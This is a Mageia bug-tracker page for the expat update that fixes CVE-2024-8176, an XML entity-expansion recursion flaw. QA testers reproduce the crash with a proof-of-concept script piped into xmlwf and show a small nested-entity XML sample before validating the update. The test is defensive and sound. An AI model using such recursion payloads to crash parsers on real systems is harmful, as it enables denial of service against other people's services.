Bug 34111 - expat new security issue CVE-2024-8176
Summary: expat new security issue CVE-2024-8176
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 9
Hardware: All Linux
Priority: Normal normal
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA9-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2025-03-17 09:31 CET by Nicolas Salguero
Modified: 2025-03-22 18:54 CET (History)
3 users (show)

See Also:
Source RPM: expat-2.6.4-1.mga9.src.rpm
CVE: CVE-2024-8176
Status comment:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Description Nicolas Salguero 2025-03-17 09:31:00 CET 
CVE-2024-8176 was announced here:
https://www.openwall.com/lists/oss-security/2025/03/14/5
Nicolas Salguero 2025-03-17 09:31:45 CET

Source RPM: (none) => expat-2.6.4-1.mga9.src.rpm
Assignee: bugsquad => nicolas.salguero
CVE: (none) => CVE-2024-8176

Comment 1 Nicolas Salguero 2025-03-19 09:24:54 CET 
Suggested advisory:
========================

The updated packages fix a security vulnerability:

Improper restriction of xml entity expansion depth in libexpat. (CVE-2024-8176)

References:
https://www.openwall.com/lists/oss-security/2025/03/14/5
========================

Updated packages in core/updates_testing:
========================
expat-2.7.0-1.mga9
lib(64)expat1-2.7.0-1.mga9
lib(64)expat-devel-2.7.0-1.mga9

from SRPM:
expat-2.7.0-1.mga9.src.rpm

Assignee: nicolas.salguero => qa-bugs
Status: NEW => ASSIGNED

katnatek 2025-03-19 19:15:08 CET

Keywords: (none) => advisory

Comment 2 katnatek 2025-03-20 19:21:38 CET 
RH x86_64

python3 payload1.py | xmlwf    -r /dev/stdin

Violación de segmento (`core' generado)


installing lib64expat1-2.7.0-1.mga9.x86_64.rpm expat-2.7.0-1.mga9.x86_64.rpm from //home/katnatek/qa-testing/x86_64
Preparing...                     ##################################################################################################
      1/2: lib64expat1           ##################################################################################################
      2/2: expat                 ##################################################################################################
      1/2: removing expat-2.6.4-1.mga9.x86_64
                                 ##################################################################################################
      2/2: removing lib64expat1-2.6.4-1.mga9.x86_64
                                 ##################################################################################################

python3 payload1.py | xmlwf    -r /dev/stdin
Not produce output

python3 payload1.py 2
<!DOCTYPE doc [
  <!ENTITY e0 ''>
  <!ENTITY e1 '&e0;'>
  <!ENTITY e2 '&e1;'>
]>
<doc>&e2;</doc>

OK I think

See https://github.com/libexpat/libexpat/issues/893

Followed the procedure from the wiki, as was used in bug#31057 comment#2 (needed test files are attached to bug#31057)

python testexpat.py 
Tested OK

xmlwf /etc/xml/catalog
xmlwf /etc/passwd
/etc/passwd:1:16: not well-formed (invalid token)

Looks good
Comment 3 Herman Viaene 2025-03-22 11:18:30 CET 
MGA9-64 Plasma Wayland on Compaq H000SB
No installation issues.
Followed tests as above with files from bug 31057:
$ python testexpat.py
Tested OK
$ python3 testexpat.py
Tested OK
$ xmlwf /etc/xml/catalog
$ xmlwf /etc/passwd
/etc/passwd:1:16: not well-formed (invalid token)
Good to go.

Whiteboard: (none) => MGA9-64-OK
CC: (none) => herman.viaene

Comment 4 Thomas Andrews 2025-03-22 14:55:32 CET 
Validating.

Keywords: (none) => validated_update
CC: (none) => andrewsfarm, sysadmin-bugs

Comment 5 Mageia Robot 2025-03-22 18:54:16 CET 
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2025-0109.html

Resolution: (none) => FIXED
Status: ASSIGNED => RESOLVED
Note You need to log in before you can comment on or make changes to this bug.